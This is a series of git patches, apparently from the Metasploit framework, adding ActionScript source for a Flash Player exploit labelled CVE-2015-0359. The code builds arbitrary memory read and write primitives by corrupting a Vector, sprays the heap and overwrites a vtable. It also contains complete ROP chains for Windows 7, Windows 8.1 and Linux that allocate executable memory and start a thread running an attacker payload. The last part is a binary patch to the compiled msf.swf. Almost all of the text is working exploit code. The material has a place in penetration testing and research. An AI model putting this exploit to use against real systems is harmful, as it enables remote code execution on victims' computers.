+                    seg_dynamic = base + e_ba.read(entry + 8)
+                    seg_dynamic_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+
+            throw new Error()
+        }
+
+        private function set_exec_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+            var p_flags:uint = 0
+            
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                p_flags = e_ba.read(entry + 0x18)
+                if (p_type == PT_LOAD && (p_flags & PT_READ_EXEC) == PT_READ_EXEC) {
+                    seg_exec = base + e_ba.read(entry + 8)
+                    seg_exec_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+ 
+        private function set_dynsym():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_SYMTAB) {
+                    sec_dynsym = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_dynstr():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_STRTAB) {
+                    sec_dynstr = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_got_plt():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_PLTGOT) {
+                    sec_got_plt = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-0359/ExploitByteArray.as b/external/source/exploits/CVE-2015-0359/ExploitByteArray.as
new file mode 100644
index 0000000000..a8da46df7b
--- /dev/null
+++ b/external/source/exploits/CVE-2015-0359/ExploitByteArray.as
@@ -0,0 +1,85 @@
+package
+{
+    import flash.utils.ByteArray
+    
+    public class ExploitByteArray
+    {
+        private const MAX_STRING_LENGTH:uint = 100
+        public var ba:ByteArray
+        public var original_length:uint
+        private var platform:String
+
+        public function ExploitByteArray(p:String, l:uint = 1024)
+        {
+            ba = new ByteArray()
+            ba.length = l
+            ba.endian = "littleEndian"
+            ba.writeUnsignedInt(0)
+            platform = p
+            original_length = l
+        }
+
+        public function set_length(length:uint):void
+        {
+            ba.length = length
+        }
+
+        public function get_length():uint
+        {
+            return ba.length
+        }
+
+        public function lets_ready():void
+        {
+            ba.endian = "littleEndian"
+            if (platform == "linux") {
+                ba.length = 0xffffffff
+            } 
+        }
+
+        public function is_ready():Boolean
+        {
+            if (ba.length == 0xffffffff)
+                return true
+
+            return false
+        }
+
+        public function read(addr:uint, type:String = "dword"):uint
+        {
+            ba.position = addr
+            switch(type) {
+                case "dword": 
+                    return ba.readUnsignedInt()
+                case "word":
+                    return ba.readUnsignedShort()
+                case "byte":
+                    return ba.readUnsignedByte()
+            }
+            return 0
+        }
+
+        public function read_string(addr:uint, length:uint = 0):String
+        {
+            ba.position = addr
+            if (length == 0)
+                return ba.readUTFBytes(MAX_STRING_LENGTH)
+            else
+                return ba.readUTFBytes(length) 
+        }
+
+        public function write(addr:uint, value:* = 0, zero:Boolean = true):void
+        {
+            var i:uint
+
+            if (addr) ba.position = addr
+            if (value is String) {
+                for (i = 0; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
+                if (zero) ba.writeByte(0)
+            } else if (value is ByteArray) {
+                var value_length:uint = value.length
+                for (i = 0; i < value_length; i++) ba.writeByte(value.readByte())
+            } else ba.writeUnsignedInt(value)
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-0359/ExploitVector.as b/external/source/exploits/CVE-2015-0359/ExploitVector.as
new file mode 100644
index 0000000000..9fcbb01f7b
--- /dev/null
+++ b/external/source/exploits/CVE-2015-0359/ExploitVector.as
@@ -0,0 +1,74 @@
+package
+{
+    public class ExploitVector
+    {
+        private var uv:Vector.<uint>
+        public var original_length:uint = 1014 
+        
+        public function ExploitVector(v:Vector.<uint>)
+        {
+            uv = v
+        }
+
+        public function restore():void
+        {
+            uv[0x3ffffffe] = original_length
+        }
+
+        public function is_ready():Boolean
+        {
+            if (uv.length > original_length) 
+            {
+                return true
+            }
+            return false
+        } 
+        
+        public function at(pos:uint):uint
+        {
+            return uv[pos]
+        }
+
+        // pos: position where a Vector.<Object>[0] lives
+        public function set_own_address(pos:uint):void
+        {
+            uv[0] = uv[pos - 5] - ((pos - 5) * 4) - 0xc
+        }
+
+        public function read(addr:uint):uint
+        {
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            return uv[pos]
+        }
+
+        public function write(addr:uint, value:uint = 0):void
+        {           
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            uv[pos] = value
+        }
+
+        public function search_pattern(pattern:uint, limit:uint):uint
+        {
+            for (var i:uint = 0; i < limit/4; i++) {
+                if (uv[i] == pattern) {
+                    return i
+                }
+            }
+            throw new Error() 
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-0359/Exploiter.as b/external/source/exploits/CVE-2015-0359/Exploiter.as
new file mode 100644
index 0000000000..0a971409f6
--- /dev/null
+++ b/external/source/exploits/CVE-2015-0359/Exploiter.as
@@ -0,0 +1,399 @@
+package
+{ 
+    import flash.utils.ByteArray
+    import flash.system.System
+
+    public class Exploiter
+    {
+        private const VECTOR_OBJECTS_LENGTH:uint = 1014
+        private var exploit:Exploit
+        private var ev:ExploitVector
+        private var eba:ExploitByteArray
+        private var payload:ByteArray
+        private var platform:String
+        private var op_system:String
+        private var pos:uint
+        private var byte_array_object:uint
+        private var main:uint
+        private var stack_object:uint
+        private var payload_space_object:uint
+        private var buffer_object:uint
+        private var buffer:uint
+        private var vtable:uint
+        private var stack_address:uint
+        private var payload_address:uint 
+        private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
+        private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
+        private var spray:Vector.<Object> = new Vector.<Object>(90000)
+
+        public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>):void
+        {
+            exploit = exp
+            payload = p
+            platform = pl
+            op_system = os
+
+            ev = new ExploitVector(uv)
+            if (!ev.is_ready()) return
+            eba = new ExploitByteArray(platform)
+            spray_objects()
+            try { pos = search_objects() } catch (err:Error) { ev.restore(); cleanup(); return; }
+            ev.set_own_address(pos)
+            if (!disclose_objects()) { ev.restore(); cleanup(); return; }
+            disclose_addresses()
+            corrupt_byte_array()
+            if (!eba.is_ready()) { ev.restore(); cleanup(); return }
+            do_rop()
+            restore_byte_array()
+            ev.restore()
+            cleanup()
+        }
+
+        private function spray_objects():void
+        {
+            Logger.log("[*] Exploiter - spray_objects()")
+            for (var i:uint = 0; i < spray.length; i++) 
+            {
+				spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
+				spray[i][0] = eba.ba
+				spray[i][1] = exploit 
+				spray[i][2] = stack
+				spray[i][3] = payload_space
+            } 
+        }
+        
+        private function search_objects():uint
+        {
+            Logger.log("[*] Exploiter - search_objects()")
+            var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0xac100)
+            return idx + 1
+        }
+
+        private function disclose_objects():Boolean
+        { 
+            Logger.log("[*] Exploiter - disclose_objects()")
+            byte_array_object = ev.at(pos) - 1
+            main = ev.at(pos + 1) - 1
+            stack_object = ev.at(pos + 2) - 1
+            payload_space_object = ev.at(pos + 3) - 1
+            if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
+                return false
+            }
+            return true
+        }
+
+        private function disclose_addresses():void
+        {
+            Logger.log("[*] Exploiter - disclose_addresses()")
+            if (platform == "linux") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x10)
+                buffer = ev.read(buffer_object + 0x1c)
+            }    
+            else if (platform == "win") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x40)
+                buffer = ev.read(buffer_object + 8)
+            }
+            vtable = ev.read(main)
+            stack_address = ev.read(stack_object + 0x18)
+            payload_address = ev.read(payload_space_object + 0x18)
+        }
+        
+        private function corrupt_byte_array():void
+        {
+            Logger.log("[*] Exploiter - corrupt_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c) // *array
+                ev.write(buffer_object + 0x20, 0xffffffff) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8) // *array
+                ev.write(buffer_object + 16, 0xffffffff) // capacity
+            }
+            eba.lets_ready()
+        }
+
+        private function restore_byte_array():void
+        { 
+            Logger.log("[*] Exploiter - restore_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c, buffer) // *array
+                ev.write(buffer_object + 0x20, 1024) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8, buffer) // *array
+                ev.write(buffer_object + 16, 1024) // capacity
+            }
+            eba.set_length(eba.original_length) 
+        }
+        
+        private function do_rop():void
+        {
+            Logger.log("[*] Exploiter - do_rop()")
+            if (platform == "linux") {
+                do_rop_linux()
+            } else if (platform == "win") {
+                if (op_system == "Windows 8.1") {
+                    do_rop_windows8()
+                } else if (op_system == "Windows 7") {
+                    do_rop_windows()
+                } else {
+                    return
+                }
+            } else {
+                return
+            }
+        }
+
+        private function do_rop_windows():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var kernel32:uint = pe.module("kernel32.dll", winmm)            
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
+            var createthread:uint = pe.procedure("CreateThread", kernel32)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+           
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
+        private function do_rop_windows8():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows8()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var advapi32:uint = pe.module("advapi32.dll", flash)
+            var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
+            var kernel32:uint = pe.module("kernel32.dll", winmm) 
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
+            var createthread:uint = pe.procedure("CreateThread", kernelbase)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
+        private function do_rop_linux():void
+        {
+            Logger.log("[*] Exploiter - do_rop_linux()")
+            var flash:Elf = new Elf(eba, vtable)
+            var feof:uint = flash.external_symbol('feof')
+            var libc:Elf = new Elf(eba, feof)
+            var popen:uint = libc.symbol("popen")
+            var mprotect:uint = libc.symbol("mprotect")
+            var mmap:uint = libc.symbol("mmap")
+            var clone:uint = libc.symbol("clone")
+            var xchgeaxespret:uint = flash.gadget("c394", 0x0000ffff)
+            var xchgeaxesiret:uint = flash.gadget("c396", 0x0000ffff)
+            var addesp2cret:uint = flash.gadget("c32cc483", 0xffffffff)
+
+            // Continuation of execution
+            // 1) Recover original vtable
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            // 2) Recover original stack
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi
+
+            // my_memcpy
+            eba.write(buffer + 0x60, "\x56", false) // push esi
+            eba.write(0, "\x57", false)             // push edi
+            eba.write(0, "\x51", false)             // push ecx
+            eba.write(0, "\x8B\x7C\x24\x10", false) // mov edi,[esp+0x10]
+            eba.write(0, "\x8B\x74\x24\x14", false) // mov esi,[esp+0x14]
+            eba.write(0, "\x8B\x4C\x24\x18", false) // mov ecx,[esp+0x18]
+            eba.write(0, "\xF3\xA4", false)         // rep movsb 
+            eba.write(0, "\x59", false)             // pop ecx
+            eba.write(0, "\x5f", false)             // pop edi
+            eba.write(0, "\x5e", false)             // pop esi
+            eba.write(0, "\xc3", false)             // ret
+
+            // Put the popen parameters in memory
+            eba.write(payload_address + 0x8, payload, true) // false
+           
+            // Put the fake stack/vtable on memory 
+            eba.write(stack_address + 0x18024, xchgeaxespret) // Initial gadget, stackpivot
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // Save original stack on esi
+            eba.write(0, addesp2cret) //second pivot to preserver stack_address + 0x18024
+
+            // Return to mprotect()
+            eba.write(stack_address + 0x18034, mprotect)
+            // Return to stackpivot (jmp over mprotect parameters)
+            eba.write(0, addesp2cret)
+            // mprotect() arguments
+            eba.write(0, buffer) // addr
+            eba.write(0, 0x1000) // size
+            eba.write(0, 0x7)    // PROT_READ | PROT_WRITE | PROT_EXEC
+
+            // Return to mmap()
+            eba.write(stack_address + 0x18068, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() code segment arguments
+            eba.write(0, 0x70000000) // 0x70000000
+            eba.write(0, 0x4000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, 0xffffffff) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to mmap()
+            eba.write(stack_address + 0x1809c, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() stack segment arguments
+            eba.write(0, 0x70008000) // NULL
+            eba.write(0, 0x10000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, -1) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to memcpy()
+            eba.write(stack_address + 0x180d0, buffer + 0x60)
+            // Return to stackpivot (jmp over memcpy parameters)
+            eba.write(0, addesp2cret)
+            // memcpy() parameters
+            eba.write(0, 0x70000000)
+            eba.write(0, payload_address + 0x8)
+            eba.write(0, payload.length)
+
+            // Return to clone()
+            eba.write(stack_address + 0x18104, clone)
+            // Return to CoE (fix stack and object vtable)
+            eba.write(0, buffer + 0x10)
+            // clone() arguments
+            eba.write(0, 0x70000000) // code
+            eba.write(0, 0x7000bff0) // stack
+            eba.write(0, 0x00000100) // flags CLONE_VM
+            eba.write(0, 0)          // args
+           
+            //call   DWORD PTR [eax+0x24]
+            //EAX: 0x41414141 ('AAAA')
+            //EDI: 0xad857088 ("AAAA\377")
+            eba.write(main, stack_address + 0x18000)
+            exploit.hasOwnProperty('msf')
+        }
+
+        private function cleanup():void
+        { 
+            Logger.log("[*] Exploiter - cleanup()")
+            spray = null
+            stack = null
+            payload_space = null
+            eba = null
+            ev = null
+            exploit = null
+            System.pauseForGCIfCollectionImminent(0)
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-0359/Logger.as b/external/source/exploits/CVE-2015-0359/Logger.as
new file mode 100644
index 0000000000..16c0447973
--- /dev/null
+++ b/external/source/exploits/CVE-2015-0359/Logger.as
@@ -0,0 +1,32 @@
+package 
+{
+    import flash.external.ExternalInterface
+
+    public class Logger {
+        private static const DEBUG:uint = 0
+ 
+        public static function alert(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg;
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("alert", str);
+            }
+        }
+
+        public static function log(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg;
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("console.log", str);
+            }
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-0359/PE.as b/external/source/exploits/CVE-2015-0359/PE.as
new file mode 100644
index 0000000000..8753586477
--- /dev/null
+++ b/external/source/exploits/CVE-2015-0359/PE.as
@@ -0,0 +1,72 @@
+package
+{
+    public class PE
+    {
+        private var eba:ExploitByteArray
+
+        public function PE(ba:ExploitByteArray)
+        {
+            eba = ba
+        }
+
+        public function base(addr:uint):uint
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (eba.read(addr) == 0x00905a4d) return addr
+                addr -= 0x10000
+            }
+            return 0
+        }
+
+        public function module(name:String, addr:uint):uint
+        {
+            var iat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x80), i:int = -1
+            var mod_name:String
+
+            while (true) {
+                var entry:uint = eba.read(iat + (++i) * 0x14 + 12)
+                if (!entry) throw new Error("FAIL!"); 
+                mod_name = eba.read_string(addr + entry, name.length)
+                if (mod_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return base(eba.read(addr + eba.read(iat + i * 0x14 + 16)))
+        }
+
+        public function procedure(name:String, addr:uint):uint
+        {
+            var eat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x78)
+            var numberOfNames:uint = eba.read(eat + 0x18)
+            var addressOfFunctions:uint = addr + eba.read(eat + 0x1c)
+            var addressOfNames:uint = addr + eba.read(eat + 0x20)
+            var addressOfNameOrdinals:uint = addr + eba.read(eat + 0x24)
+            var proc_name:String
+
+            for (var i:uint = 0; ; i++) {
+                var entry:uint = eba.read(addressOfNames + i * 4)
+                proc_name = eba.read_string(addr + entry, name.length + 2)
+                if (proc_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return addr + eba.read(addressOfFunctions + eba.read(addressOfNameOrdinals + i * 2, "word") * 4)
+        }
+
+        public function gadget(gadget:String, hint:uint, addr:uint):uint
+        {
+            var find:uint = 0
+            var contents:uint = 0
+            var limit:uint = eba.read(addr + eba.read(addr + 0x3c) + 0x50)
+            var value:uint = parseInt(gadget, 16)
+
+            for (var i:uint = 0; i < limit - 4; i++) {
+                contents = eba.read(addr + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return addr + i
+                }
+                if (hint != 0xffffffff && value == (contents & hint)) {
+                    return addr + i
+                }
+            }
+            throw new Error()
+        }
+    }
+}

From 7527aa4f3410a5b39fdd126e7e96f933280b024b Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 10 Jun 2015 14:07:18 -0500
Subject: [PATCH 0390/1013] Disable debug

---
 data/exploits/CVE-2015-0359/msf.swf | Bin 20979 -> 21021 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)

diff --git a/data/exploits/CVE-2015-0359/msf.swf b/data/exploits/CVE-2015-0359/msf.swf
index cd880de1e3d5a4c6153860de72c8d9701a8bbbd4..28e9a0938e552da0b0e78e8a768d751ed3412266 100755
GIT binary patch
delta 20904
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
